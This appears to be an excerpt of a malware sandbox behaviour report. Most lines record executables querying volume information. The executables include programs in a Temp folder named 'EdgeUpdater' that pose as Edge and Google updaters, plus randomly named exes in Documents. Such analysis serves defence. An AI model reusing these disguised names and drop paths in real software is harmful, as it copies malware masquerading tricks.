Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe VolumeInformation
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Queries volume information: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe VolumeInformation
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Queries volume information: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe VolumeInformation
